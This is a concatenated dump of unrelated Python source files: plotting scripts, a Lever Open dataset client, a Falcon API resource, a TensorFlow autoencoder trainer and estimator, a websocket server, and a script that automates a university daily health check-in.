event[\"FlowData\"]:\n\t\t\tflowsData[flow[\"FlowID\"]][\"Flow Rate (Mbps)\"].append(flow[\"FlowRate\"])\n\t\t\tflowsData[flow[\"FlowID\"]][\"Window Size (pkts)\"].append(flow[\"WinSize\"])\n\t\t\tflowsData[flow[\"FlowID\"]][\"Packet Delay (ms)\"].append(flow[\"PktDelay\"])\n\n\treturn (times, linksData, flowsData)\n\n\ndef plotLinkData(time, linksData):\n\t'''\n\tGiven array of time data and dictionary containg metrics for all links,\n\tgenerate three plots: 1 showing each metric for all links.\n\t'''\n\n\tf, (lrates, buffocc, pktloss) = plt.subplots(3, 1, sharex=True)\n\n\t# set window title\n\tf.canvas.set_window_title(\"Flow Metrics Graph\")\n\t\n\t# plot link rates, buff occup, packet loss for all links\n\t# note: 'o' is to ensure scatterplot\n\tfor link in linksData.keys():\n\t\tlrates.plot(time, linksData[link][\"Link Rate (Mbps)\"], 'o', label=str(link))\n\t\tbuffocc.plot(time, linksData[link][\"Buffer Occupancy (pkts)\"], 'o', label=str(link))\n\t\tpktloss.plot(time, linksData[link][\"Packet Loss (pkts)\"], 'o', label=str(link))\n\t\n\t# add titles and labels and legend to plots\n\tlrates.set_xlabel('Time (ms)')\n\tlrates.set_ylabel('Link Rate (Mbps)')\n\tlrates.legend()\n\t\n\tbuffocc.set_xlabel('Time (ms)')\n\tbuffocc.set_ylabel('Buffer Occupancy (pkts)')\n\tbuffocc.legend()\n\t\n\tpktloss.set_xlabel('Time (ms)')\n\tpktloss.set_ylabel('Packet Loss (pkts)')\n\tpktloss.legend()\n\n\t# set window title\n\tf.canvas.set_window_title(\"Link Metrics Graph\")\n\n\ndef plotFlowData(time, flowsData):\n\t'''\n\tGiven array of time data and dictionary containg metrics for all flows,\n\tgenerate three plots: 1 showing each metric for all flows.\n\t'''\n\tf, (frates, winsize, pktdelay) = plt.subplots(3, 1, sharex=True)\n\t\n\t# plot flow rates, buff occup, packet loss for all links\n\t# note: 'o' is to ensure scatterplot\n\tfor flow in flowsData.keys():\n\t\tfrates.plot(time, flowsData[flow][\"Flow Rate (Mbps)\"], 'o',label=str(flow))\n\t\twinsize.plot(time, flowsData[flow][\"Window Size (pkts)\"], 'o', label=str(flow))\n\t\tpktdelay.plot(time, flowsData[flow][\"Packet Delay (ms)\"], 'o', label=str(flow))\n\t\n\t# add titles and labels to plots\n\tfrates.set_xlabel('Time (ms)')\n\tfrates.set_ylabel('Flow Rate (Mbps)')\n\tfrates.legend()\n\t\n\twinsize.set_xlabel('Time (ms)')\n\twinsize.set_ylabel('Window Size (pkts)')\n\twinsize.legend()\n\t\n\tpktdelay.set_xlabel('Time (ms)')\n\tpktdelay.set_ylabel('Packet Delay (ms)')\n\tpktdelay.legend()\n\n\t# set window title\n\t# don't really understand why this isn't working\n\tf.canvas.set_window_title(\"Flow Metrics Graph\")\n\ndef plotAll(time, linksData, flowsData):\n\t''' Generates plots for flow and link data'''\n\t# plot flows\n\tplotLinkData(time, linksData)\n\t# plot links\n\tplotFlowData(time, flowsData)\n\n\tplt.show()\n\nif __name__ =='__main__':\n\ttry:\n\t\tfilename = sys.argv[1]\n\t\t\n\t\t# make sure it's a json file\n\t\tif filename.split('.')[1] != \"json\":\n\t\t\traise IOError()\n\t\t\n\t\ttime, links, flows = loadAllData(filename)\n\t\tplotAll(time, links, flows)\n\t\n\texcept IndexError:\n\t\tprint >> sys.stderr, \"usage: python plotNetSimGraphs *.json\"\n\t\tsys.exit(1)\n\n\texcept IOError:\n\t\tprint >> sys.stderr, \"usage: python plotNetSimGraphs *.json\"\n\t\tprint >> sys.stderr, \" input must be valid *.json file format\"\n\t\tsys.exit(1)","sub_path":"plot/plotNetSimData.py","file_name":"plotNetSimData.py","file_ext":"py","file_size_in_byte":5103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"175620431","text":"from typing import List\nimport datetime as dt\n\nimport pandas as pd\nfrom tqdm import tqdm\nfrom halo import Halo\n\nimport leveropen.client\nfrom leveropen.l_series import LSeries\nfrom leveropen.utils import parse_categories\n\n\nclass Dataset:\n \"\"\"\n Represents a Lever Open dataset\n\n :param uuid: Unique ID of the dataset\n :type uuid: str\n :param name: Name of the dataset\n :type name: str\n :param released_on: Most recent released date of the data\n :type released_on: datetime.datetime\n :param processed_on: Most recent date that Lever Open processed the data\n :type processed_on: datetime.datetime\n :param collection: Collection to which the dataset belongs\n :type collection: str\n :param topic: Topic to which the dataset belongs\n :type topic: str\n :param link: URL\n :type link: str\n :param license: {'name': 'License name', 'url': 'link-to-license'}\n :type license: dict\n :param datetimes: e.g. ``[{'name': 'Month', 'range': ['January 1997', 'December 2020']}, ...]``\n :type datetimes: List[dict]\n :param locations: e.g. ``[{'type': 'Country', 'name', 'UK'}, ...]``\n :type locations: List[dict]\n :param categories: e.g. ``[{'type': 'Sector', 'name': 'Construction'}, ...]``\n :type categories: List[dict]\n :param series_url: URL link to series data\n :type series_url: str\n :param client: Lever Open API Client\n :type client: :func:`leveropen.client.Client`\n\n \"\"\"\n\n def __init__(\n self,\n uuid: str,\n name: str,\n released_on: dt.datetime,\n processed_on: dt.datetime,\n collection: str,\n topic: str,\n link: str,\n license: dict,\n datetimes: List[dict],\n locations: List[dict],\n categories: List[dict],\n series_url: str,\n client: leveropen.client.Client,\n ):\n self.uuid = uuid\n self.name = name\n self.released_on = released_on\n self.processed_on = processed_on\n self.collection = collection\n self.topic = topic\n self.link = link\n self.license = license\n self.datetimes = datetimes\n self.locations = locations\n self.categories = categories\n self.series_url = series_url\n self.series = None\n self.series_objects = None\n self.client = client\n\n def __repr__(self):\n return f\"\"\"\n {self.__class__.__name__}(\n uuid={repr(self.uuid)},\n name={repr(self.name)},\n released_on={repr(self.released_on)},\n processed_on={repr(self.processed_on)},\n collection={repr(self.collection)},\n topic={repr(self.topic)},\n link={repr(self.link)},\n license={repr(self.license)},\n datetimes={repr(self.datetimes)},\n locations={repr(self.locations)},\n categories={repr(self.categories)},\n series_url={repr(self.series_url)}\n )\"\"\"\n\n def __eq__(self, other):\n criteria = (\n (isinstance(other, Dataset))\n and (self.uuid == other.uuid)\n and (self.name == other.name)\n and (self.released_on == other.released_on)\n and (self.processed_on == other.processed_on)\n and (self.collection == other.collection)\n and (self.topic == other.topic)\n and (self.link == other.link)\n and (self.license == other.license)\n and (self.datetimes == other.datetimes)\n and (self.locations == other.locations)\n and (self.categories == other.categories)\n and (self.series_url == other.series_url)\n )\n return criteria\n\n def get_metadata(self) -> pd.Series:\n \"\"\"\n\n :return: Key information about the dataset\n :rtype: pandas.Series\n\n :example:\n\n .. code-block:: python\n\n >>> metadata = self.get_metadata()\n >>> metadata.head()\n name Example Dataset\n topic Economy\n collection Gross Domestic Product (GDP)\n released_on 2021-02-12 00:00:00\n processed_on 2021-03-05 00:00:00\n Name: example-dataset-uuid, dtype: object\n\n \"\"\"\n return pd.Series(\n data={\n \"name\": self.name,\n \"topic\": self.topic,\n \"collection\": self.collection,\n \"released_on\": self.released_on,\n \"processed_on\": self.processed_on,\n \"link\": self.link,\n \"license_name\": self.license[\"name\"],\n \"license_url\": self.license[\"url\"],\n \"series_names_and_uuids\": self.get_series_names_and_uuids(),\n \"categories\": self.get_categories(),\n },\n name=self.uuid,\n )\n\n def get_categories(self) -> pd.DataFrame:\n \"\"\"\n\n :return: Type and Categories\n :rtype: pandas.DataFrame\n\n :example:\n\n .. code-block:: python\n\n >>> self.get_categories()\n type name\n 0 Sector Construction\n 1 Sector Services\n 2 Adjustment Seasonally adjusted\n 3 Sector Production\n 4 Total Monthly GDP\n 5 Sector Agriculture\n\n \"\"\"\n return parse_categories(categories=self.categories)\n\n def get_series(self, load: bool = True) -> List[LSeries]:\n \"\"\"\n\n :param load: if ``'True'`` then self.series_objects is set\n :return: all series names on the dataset\n :rtype: List[LSeries]\n\n :example:\n\n .. code-block:: python\n\n >>> self.get_series()\n [\n LSeries(\n uuid='uuid-of-series-one',\n name='Series-Name-One',\n units='Count',\n magnitude=1,\n ...\n ),\n LSeries(\n uuid='uuid-of-series-two',\n name='Series-Name-Two',\n units='Count',\n magnitude=1,\n ...\n )\n ]\n\n \"\"\"\n series = self.series or self._get_series_by_url()\n parsed_series = self._parse_series(series)\n if load:\n self.series_objects = parsed_series\n return parsed_series\n\n def get_series_names_and_uuids(self) -> pd.DataFrame:\n \"\"\"\n\n :return: all series name and their uuid\n :rtype: pandas.DataFrame\n\n :example:\n\n .. code-block:: python\n\n >>> self.get_series_names_and_uuids()\n name uuid\n 0 Series-Name-One uuid-of-series-one\n 1 Series-Name-Two uuid-of-series-Two\n 2 ... ...\n n Series-Name-N uuid-of-series-N\n\n \"\"\"\n series = self.series_objects or self.get_series()\n return pd.DataFrame(\n data={\n \"name\": [s.name for s in series],\n \"uuid\": [s.uuid for s in series],\n }\n )\n\n def get_series_by_name(self, name: str) -> LSeries:\n \"\"\"\n\n :param name: the name of the series :attr:`leveropen.l_series.LSeries.name`\n :return: LSeries\n\n :example:\n\n .. code-block:: python\n\n >>> self.get_series_by_name(name='Series-Name-One')\n LSeries(\n uuid='uuid-of-series-one',\n name='Series-Name-One',\n units='Count',\n magnitude=1,\n ...\n )\n\n \"\"\"\n series = [s for s in self.get_series() if s.name == name]\n if not series:\n raise ValueError(\n f\"The dataset '{self.name}' has no series matching the name '{name}'\"\n )\n if len(series) == 1:\n return series[0]\n else:\n raise ValueError(\n f\"More than one series has the name '{name}'. \"\n f\"Try using the method get_series_by_name_containing\"\n )\n\n def get_series_by_uuid(self, uuid: str) -> LSeries:\n \"\"\"\n\n :param uuid: the uuid of the series :attr:`leveropen.l_series.LSeries.uuid`\n :return: LSeries\n\n :example:\n\n .. code-block:: python\n\n >>> self.get_series_by_uuid(uuid='uuid-of-series-one')\n LSeries(\n uuid='uuid-of-series-one',\n name='Series-Name-One',\n units='Count',\n magnitude=1,\n ...\n )\n\n \"\"\"\n series = [s for s in self.get_series() if s.uuid == uuid]\n if not series:\n raise ValueError(\n f\"The dataset '{self.uuid}' has no series matching the name '{uuid}'\"\n )\n if len(series) == 1:\n return series[0]\n else:\n raise ValueError(f\"More than one series has the uuid '{uuid}'\")\n\n def get_series_by_name_containing(\n self, name_containing_string: str\n ) -> List[LSeries]:\n \"\"\"\n\n :param name_containing_string: substring for which to find in series names\n :type name_containing_string: str\n :return: list of Lever Open Series\n :rtype: List[LSeries]\n\n :example:\n\n .. code-block:: python\n\n >>> self.get_series_by_name_containing(\n ... name_containing_string='Series-Name'\n ... )\n [\n LSeries(\n uuid='uuid-of-series-one',\n name='Series-Name-One',\n units='Count',\n magnitude=1,\n ...\n ),\n LSeries(\n uuid='uuid-of-series-two',\n name='Series-Name-Two',\n units='Count',\n magnitude=1,\n ...\n )\n ]\n\n \"\"\"\n series = [\n s for s in self.get_series() if s.name.find(name_containing_string) != -1\n ]\n if not series:\n raise ValueError(\n f\"The dataset {self.name} has no series names containing '{name_containing_string}'\"\n )\n return series\n\n def _get_series_by_url(self, load=True):\n url = self.series_url\n url = url.replace(self.client.host_url, \"\")\n next_page = True\n page = 1\n spinner = Halo(text=\"Requesting series data\", spinner=\"dots\")\n spinner.start()\n all_data_series = []\n while next_page:\n spinner.text = f\"Requesting series data: page={page}\"\n content = self.client.get(url, params={\"page\": page}, verbose=False).json()\n next_link = content[\"links\"][\"next\"]\n data_series = content[\"data\"][\"series\"]\n all_data_series = all_data_series + data_series\n if not next_link:\n next_page = False\n else:\n page += 1\n if not all_data_series:\n spinner.fail(\"Loading series data failed\")\n raise ValueError(f\"Loading series data failed\")\n else:\n spinner.succeed(\"Loading series data successful\")\n if load:\n self.series = all_data_series\n return all_data_series\n\n def _parse_series(self, series: list):\n series_objects = []\n for s in tqdm(series, desc=\"Parsing series\", unit=\"series\"):\n series_objects.append(\n LSeries(\n uuid=s.get(\"uuid\"),\n name=s.get(\"name\"),\n units=s.get(\"units\"),\n magnitude=s.get(\"magnitude\"),\n link=s.get(\"link\"),\n date_time=s.get(\"datetime\"),\n location=s.get(\"location\"),\n categories=s.get(\"categories\"),\n client=self.client,\n )\n )\n return series_objects\n","sub_path":"leveropen/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":12250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"404574362","text":"import json\nimport falcon\nfrom ebl.require_scope import require_scope\nfrom ebl.fragmentarium.transliterations import Transliteration\n\n\nclass FragmentsResource:\n def __init__(self, fragmentarium):\n self._fragmentarium = fragmentarium\n\n @falcon.before(require_scope, 'read:fragments')\n def on_get(self, req, resp, number):\n user = req.context['user']\n try:\n resp.media = (self\n ._fragmentarium\n .find(number)\n .to_dict_for(user))\n except KeyError:\n resp.status = falcon.HTTP_NOT_FOUND\n\n @falcon.before(require_scope, 'transliterate:fragments')\n def on_post(self, req, resp, number):\n def parse_request():\n body = json.loads(req.stream.read())\n try:\n return Transliteration(\n body['transliteration'],\n body['notes']\n )\n except (TypeError, KeyError):\n raise falcon.HTTPUnprocessableEntity()\n\n try:\n self._fragmentarium.update_transliteration(\n number,\n parse_request(),\n req.context['user']\n )\n except KeyError:\n resp.status = falcon.HTTP_NOT_FOUND\n","sub_path":"ebl/fragmentarium/fragments.py","file_name":"fragments.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"626645802","text":"#!/usr/bin/python3\n\nimport argparse\nfrom matplotlib import pyplot as plt\nfrom scipy.stats.stats import linregress\n\nimport matplotlib\nmatplotlib.rcParams['lines.linewidth'] = 1.5\nmatplotlib.rcParams['axes.linewidth'] = 1.5\nmatplotlib.rcParams['axes.labelsize'] = 16\nmatplotlib.rcParams['axes.color_cycle'] = list('crgmybk')\nmatplotlib.rcParams['font.size'] = 10\nmarkers = ('o', 'v', '^', '<', '>', 's', '8', 'p')\n\n\ndef convert(line, target='float'):\n if target == 'float':\n return [float(i) for i in line]\n elif target == 'int':\n return [int(i) for i in line]\n elif target == 'str':\n return [str(i) for i in line]\n\n\ndef get_data(data_file):\n \"\"\"\n Hyposis that there is no SD bar for x axis.\n \"\"\"\n clean_data = list()\n with open(data_file, 'r') as raw:\n for line in raw.readlines():\n if line.startswith('#'):\n continue\n line = line.strip()\n line = line.split(sep=arg.split)\n if len(line) < 2:\n continue\n clean_data.append(line)\n\n axis_unit = dict()\n y = dict()\n for n, line in enumerate(clean_data):\n label = line[0]\n unit = line[1]\n value = convert(line[2:])\n if len(value) == 0:\n continue\n if label.startswith('x_value'):\n axis_unit['x'] = unit\n x = convert(value)\n continue\n elif label.startswith('#'):\n continue\n else:\n axis_unit['y'] = unit\n last_line = clean_data[n-1]\n if label == last_line[0]:\n y[last_line[0]] = [convert(last_line[2:]), convert(value)]\n else:\n y[label] = [convert(value), list()]\n return axis_unit, x, y\n\n\ndef draw_fit(x, y):\n range = arg.regression\n x = x[:range]\n y = y[:range]\n slope, intercept, r_value, *_ = linregress(x, y)\n text = r'$f(x)={0:.3f}x+{1:.3f}, R^2={2:.3f}$'.format(\n slope, intercept, r_value**2)\n fit = [slope*i+intercept for i in x]\n plt.plot(x[:arg.regression], fit, 'k--')\n plt.annotate(text, xy=(x[-1], y[-2]))\n\n\ndef main():\n \"\"\"\n The input file should look like this:\n x_value unit 1 2 3\n ylabel unit 23 3 5\n y_sd unit 3 3 3\n The line starts with # will be ignored.\n \"\"\"\n parser = argparse.ArgumentParser(description=main.__doc__)\n parser.add_argument('--path', default='./',\n help='target path, default is \"./\"')\n parser.add_argument('data', default='a.txt')\n parser.add_argument('-s', '--split', default=' ', type=str)\n parser.add_argument('-o', '--output', default='output')\n parser.add_argument('-r', '--regression', type=int, default=0)\n global arg\n arg = parser.parse_args()\n data = get_data(arg.data)\n unit, x, y = data\n plt.xlabel(unit['x'])\n plt.ylabel(unit['y'])\n # line format\n fmt = '-'\n for i, marker in zip(y.keys(), markers):\n if len(y[i][1]) == 0:\n y[i][1] = [0] * len(y[i][0])\n plt.errorbar(x, y[i][0], fmt=fmt+marker, markeredgecolor='none',\n yerr=y[i][1], ecolor='k', label=i)\n if arg.regression != 0:\n draw_fit(x, y[i][0])\n if len(y) > 1:\n plt.legend(loc='best')\n plt.savefig(arg.output+'.png')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"plot/dot.py","file_name":"dot.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"533815329","text":"import numpy as np\nfrom global_module.implementation_module import Autoencoder\nfrom global_module.implementation_module import Reader\nimport tensorflow as tf\nfrom global_module.settings_module import ParamsClass, Directory, Dictionary\nimport random\nimport sys\nimport time\n\n\nclass Train:\n def __init__(self):\n self.iter_train = 0\n self.iter_valid = 0\n\n def run_epoch(self, session, min_loss, model_obj, reader, input, writer):\n global epoch_combined_loss, step\n epoch_combined_loss = 0.0\n\n params = model_obj.params\n dir_obj = model_obj.dir_obj\n for step, curr_input in enumerate(reader.data_iterator(input)):\n feed_dict = {model_obj.input: curr_input}\n if params.mode == 'TR':\n run_metadata = tf.RunMetadata()\n inp, op, total_loss, summary_train, _ = session.run([model_obj.input, model_obj.decoded_op, model_obj.loss, model_obj.merged_summary_train, model_obj.train_op],\n run_metadata=run_metadata,\n feed_dict=feed_dict)\n self.iter_train += 1\n if self.iter_train % params.log_step == 0 and params.log:\n writer.add_run_metadata(run_metadata, 'step%d' % self.iter_train)\n writer.add_summary(summary_train, self.iter_train)\n\n elif params.mode == 'VA':\n total_loss, summary_valid = session.run([model_obj.loss, model_obj.merged_summary_valid],\n feed_dict=feed_dict)\n self.iter_valid += 1\n if self.iter_valid % params.log_step == 0 and params.log:\n writer.add_summary(summary_valid, self.iter_valid)\n\n else:\n total_loss = session.run(model_obj.loss, feed_dict=feed_dict)\n\n epoch_combined_loss += total_loss\n\n epoch_combined_loss /= step\n if params.mode == 'VA':\n model_saver = tf.train.Saver()\n print('**** Current minimum on valid set: %.4f ****' % min_loss)\n\n if epoch_combined_loss < min_loss:\n min_loss = epoch_combined_loss\n model_saver.save(session,\n save_path=dir_obj.model_path + dir_obj.model_name,\n latest_filename=dir_obj.latest_checkpoint)\n print('==== Model saved! ====')\n\n return epoch_combined_loss, min_loss\n\n def run_train(self):\n global train_writer, valid_writer\n mode_train, mode_valid = 'TR', 'VA'\n\n # train object\n params_train = ParamsClass(mode=mode_train)\n dir_train = Directory(mode_train)\n train_reader = Reader(params_train)\n train_instances = train_reader.read_image_data(dir_train.data_filename)\n\n # valid object\n params_valid = ParamsClass(mode=mode_valid)\n dir_valid = Directory(mode_valid)\n valid_reader = Reader(params_valid)\n if dir_valid.data_filename is None:\n all_instances = train_instances\n train_instances = all_instances[: int(0.8 * len(all_instances))]\n valid_instances = all_instances[int(0.8 * len(all_instances)):]\n else:\n valid_instances = valid_reader.read_image_data(dir_valid.data_filename)\n\n random.seed(4321)\n if (params_train.enable_shuffle):\n random.shuffle(train_instances)\n random.shuffle(valid_instances)\n\n global_min_loss = sys.float_info.max\n\n print('***** INITIALIZING TF GRAPH *****')\n\n with tf.Graph().as_default(), tf.Session() as session:\n # random_normal_initializer = tf.random_normal_initializer()\n # random_uniform_initializer = tf.random_uniform_initializer(-params_train.init_scale, params_train.init_scale)\n xavier_initializer = tf.contrib.layers.xavier_initializer(uniform=True, seed=None, dtype=tf.float32)\n\n # with tf.name_scope('train'):\n with tf.variable_scope(\"model\", reuse=None, initializer=xavier_initializer):\n train_obj = Autoencoder(params_train, dir_train)\n\n # with tf.name_scope('valid'):\n with tf.variable_scope(\"model\", reuse=True, initializer=xavier_initializer):\n valid_obj = Autoencoder(params_valid, dir_valid)\n\n if not params_train.enable_checkpoint:\n session.run(tf.global_variables_initializer())\n\n if params_train.enable_checkpoint:\n ckpt = tf.train.get_checkpoint_state(dir_train.model_path)\n if ckpt and ckpt.model_checkpoint_path:\n print(\"Loading model from: %s\" % ckpt.model_checkpoint_path)\n tf.train.Saver().restore(session, ckpt.model_checkpoint_path)\n\n print('**** TF GRAPH INITIALIZED ****')\n\n if params_train.log:\n train_writer = tf.summary.FileWriter(dir_train.log_path + '/train', session.graph)\n valid_writer = tf.summary.FileWriter(dir_train.log_path + '/valid')\n\n # train_writer.add_graph(tf.get_default_graph())\n\n start_time = time.time()\n for i in range(params_train.max_max_epoch):\n lr_decay = params_train.lr_decay ** max(i - params_train.max_epoch, 0.0)\n # train_obj.assign_lr(session, params_train.learning_rate * lr_decay)\n\n # print(params_train.learning_rate * lr_decay)\n\n print('\\n++++++++=========+++++++\\n')\n lr = params_train.learning_rate * lr_decay\n print(\"Epoch: %d Learning rate: %.5f\" % (i + 1, lr))\n train_loss, _, = self.run_epoch(session, global_min_loss, train_obj, train_reader, train_instances, train_writer)\n print(\"Epoch: %d Train loss: %.4f\" % (i + 1, train_loss))\n\n valid_loss, curr_min_loss = self.run_epoch(session, global_min_loss, valid_obj, valid_reader, valid_instances, valid_writer)\n if (curr_min_loss < global_min_loss):\n global_min_loss = curr_min_loss\n\n print(\"Epoch: %d Valid loss: %.4f\" % (i + 1, valid_loss))\n\n curr_time = time.time()\n print('1 epoch run takes ' + str(((curr_time - start_time) / (i + 1)) / 60) + ' minutes.')\n\n if params_train.log:\n train_writer.close()\n valid_writer.close()\n","sub_path":"global_module/implementation_module/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"118192405","text":"import json\nimport dbHandler as dbh\nfrom autobahn.twisted.websocket import WebSocketServerProtocol, \\\n\tWebSocketServerFactory\n\nclass MyServerProtocol(WebSocketServerProtocol):\n\tdef onConnect(self, request):\n\t\tprint(\"Client connecting: {0}\".format(request.peer))\n\tdef onOpen(self):\n\t\tprint(\"WebSocket connection open.\")\n\tdef onMessage(self, payload,isBinary):\n\t\tpayload=json.loads(payload.decode('utf8'))\n\t\tif payload[\"action\"]==\"PUSH\":\n\t\t\tprint(\"PUSH\")\n\t\t\tcon=dbh.Connect()\n\t\t\tif len(con.getTable(\"data\",[\"date\"],{\"date\":payload[\"date\"]}))==1:\n\t\t\t\tprint(\"updating table\")\n\t\t\t\tcon.updateTable(\"data\",{\"info\":(json.dumps(payload[\"info\"])).replace(\"\\\"\",\"\\\\\\\"\")},{\"date\":payload[\"date\"]})\n\t\t\telse:\n\t\t\t\tprint(\"creatng new entry\")\n\t\t\t\tcon.insertIntoTable(\"data\",{\"date\":payload[\"date\"],\"info\":(json.dumps(payload[\"info\"])).replace(\"\\\"\",\"\\\\\\\"\")})\n\t\t\tcon.close()\n\t\tif payload[\"action\"]==\"PULL\":\n\t\t\tdata=dbh.getTable(\"data\",[\"info\"],{\"date\":payload[\"date\"]})\n\t\t\tif len(data)==1:\n\t\t\t\tself.sendMessage(json.dumps({\"info\":data[0][\"info\"],\"action\":\"updateInfo\"}).encode('utf8'),True)\n\t\t\telse:\n\t\t\t\tself.sendMessage(json.dumps({\"action\":\"Start New Input\"}).encode('utf8'),True)\n\t\tif payload[\"action\"]==\"PURGE\":\n\t\t\tdbh.deleteFromTable(\"data\",{\"date\":payload[\"date\"]})\ndef onClose(self, wasClean, code, reason):\n\t\tprint(\"connection closed\")\nif __name__ == '__main__':\n\n\timport sys\n\n\tfrom twisted.python import log\n\tfrom twisted.internet import reactor\n\n\tlog.startLogging(sys.stdout)\n\tfactory = WebSocketServerFactory(u\"ws://127.0.0.1:5000\")\n\tfactory.protocol = MyServerProtocol\n\n\treactor.listenTCP(5000, factory)\n\treactor.run()\n","sub_path":"websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"575866813","text":"import requests\nimport re\nimport os\nimport time\nrequests.packages.urllib3.disable_warnings()\n\n\ndef SendText(api,Error):\n print(Error)\n requests.post(url=api, data={'text': '浙大健康打卡失败','desp':Error,})\n exit()\n\n\ndef handler(event, context):\n try:\n ua = r'' # 自己的钉钉ua,如在钉钉中打开http://www.all-tool.cn/Tools/ua/\n api = r'https://sc.ftqq.com/XXX.send' # server酱的微信推送api,用于打卡失败提醒,很重要务必设置\n area = r'xx省 xx市 xx区' # 如浙江省 温州市 鹿城区 或 北京市 北京市 东城区。这里把手机关闭定位或不授予应用定位权限手动选择\n exit() # 修改完上面的删掉这句\n version=requests.get('https://pastebin.com/raw/6XCDvF71',verify=False).text\n if version != '2020/8/30': # 检测一下有无更新,github国内访问不稳定\n SendText(api, '请更新版本\\nhttps://github.com/yep96/ZJU_healthreport')\n s = requests.Session()\n if os.path.exists('cookies'):\n with open('cookies') as f:\n dict = eval(f.read())\n s.cookies = requests.utils.cookiejar_from_dict(dict, cookiejar=None, overwrite=True)\n else:\n SendText(api, '云函数无法修改文件,请在本地运行一次后获取cookies文件,上传至代码目录')\n res = s.get(url='https://healthreport.zju.edu.cn/ncov/wap/default/index',headers={'User-Agent':ua,},verify=False)\n res.raise_for_status()\n res.encoding = \"utf-8\"\n if (len(re.findall('getdqtlqk',res.text)) != 15) or (len(re.findall('武汉',res.text)) != 2) or (len(re.findall('大连',res.text)) != 1) or (len(re.findall('active',res.text)) != 75):\n SendText(api, '表单已更改,请等待更新或自行修改') # 从“以下地区返回浙江”地区数量是否改变简单判断表单是否改变\n with open('data', encoding='utf-8') as f:\n data = eval(f.read())\n data['area'] = area\n data['province'] = area.split()[0]\n data['city'] = area.split()[1]\n data['id'] = re.search(r'id\":\"(\\d*?)\"', res.text).groups()[0]\n data['uid'] = re.search(r'uid\":\"(\\d*?)\"', res.text).groups()[0]\n data['date'] = re.search(r'date\":\"(\\d*?)\"', res.text).groups()[0]\n data['created'] = re.search(r'created\":\"(\\d*?)\"', res.text).groups()[0]\n data2 = {'error': r'{\"type\":\"error\",\"message\":\"Get geolocation time out.Get ipLocation failed.\",\"info\":\"FAILED\",\"status\":0}'}\n time.sleep(5)\n s.post(url='https://healthreport.zju.edu.cn/ncov/wap/default/save-geo-error',data=data2,headers={'User-Agent':ua,},verify=False)\n time.sleep(5) # 延迟假装在填写,应该没用\n res = s.post(url='https://healthreport.zju.edu.cn/ncov/wap/default/save',data=data,headers={'User-Agent':ua,},verify=False)\n res.raise_for_status()\n res.encoding = \"utf-8\"\n if (re.search('\"e\":0',res.text) is None): # 检查返回值,是否成功打卡\n SendText(api, '打卡失败')\n print('打卡成功')\n except Exception as e:\n SendText(api,str(e))\n","sub_path":"index_Ali.py","file_name":"index_Ali.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"281479101","text":"import tensorflow as tf\nimport numpy as np\nimport types\nimport time\nimport dataset\nimport model\nimport optim\nimport decay\n\nfrom typing import Union, Callable\nfrom util.ops import softmax_loss, accuracy\n\n\nclass Estimator(object):\n def __init__(self,\n dataset: dataset.DatasetBuilder,\n model: model.Model,\n optimizer: optim.Optimizer,\n use_fp16=True):\n self.dataset = dataset\n self.model = model\n self.optimizer = optimizer\n self.use_fp16 = use_fp16\n\n def train(self,\n train_batch_size: int,\n test_batch_size: int,\n total_steps: int,\n test_steps: int,\n lr_decay: decay.Decay,\n init_callback: Union[None, Callable[[tf.Session], None]]=None,\n logging=True):\n total_metrics = {'global_step': [],\n 'train/loss': [], 'train/acc/top-1': [], 'train/acc/top-5': [],\n 'test/loss': [], 'test/acc/top-1': [], 'test/acc/top-5': []}\n\n # reset all before graphs\n tf.reset_default_graph()\n\n # get operations for training and testing\n train_ops = self._build_train_ops(train_batch_size, total_steps, lr_decay)\n tf.get_variable_scope().reuse_variables()\n test_ops = self._build_test_ops(test_batch_size)\n\n with tf.Session() as sess:\n # initialize global variables randomly\n tf.initializers.global_variables().run()\n\n # handle init callback\n if init_callback: init_callback(sess)\n\n # variables to record ETA and to calculate each metrics\n last_time_stamp = time.time()\n batch_train_metrics = {'loss': [], 'acc/top-1': [], 'acc/top-5': []}\n\n print('[*] Start training the model...')\n for step in range(1, total_steps + 1):\n # train the model and get metrics\n metrics = sess.run(train_ops)\n\n for k, v in metrics.items():\n if k in batch_train_metrics:\n batch_train_metrics[k].append(v)\n\n if step % test_steps == 0:\n # evaluate the model with test dataset\n test_metrics = sess.run(test_ops)\n\n # add to the total-metrics\n total_metrics['global_step'].append(step)\n for k, v in batch_train_metrics.items():\n total_metrics['train/' + k].append(np.mean(v))\n for k, v in test_metrics.items():\n total_metrics['test/' + k].append(v)\n\n if logging:\n print(f'[*] Iteration {step: 7d}/{total_steps: 7d}'\n f' has been estimated. ETA: {time.time() - last_time_stamp:.2f}')\n\n # reset all temporal variables to record and to calculate again\n last_time_stamp = time.time()\n batch_train_metrics = {'loss': [], 'acc/top-1': [], 'acc/top-5': []}\n\n # get all global variables from session\n global_variables = sess.run({v.name.split(':')[0]: v for v in tf.global_variables()})\n\n return total_metrics, global_variables\n\n def _build_train_ops(self,\n batch_size: int,\n total_steps: int,\n lr_decay: decay.Decay):\n # get tensors from dataset and predict the output\n features, labels = (self.dataset\n .build(batch_size, is_training=True)\n .make_one_shot_iterator()\n .get_next())\n if self.use_fp16: features = tf.cast(features, tf.float16)\n\n logits = self.model.call(features, is_training=True)\n if self.use_fp16: logits = tf.cast(logits, tf.float32)\n\n # calculate loss and accuracy of prediction\n loss_op = softmax_loss(logits, labels)\n acc_1_op = accuracy(logits, labels, top_k=1)\n acc_5_op = accuracy(logits, labels, top_k=5)\n\n # train by optimizer with learning rate decay\n global_step = tf.train.get_or_create_global_step()\n with 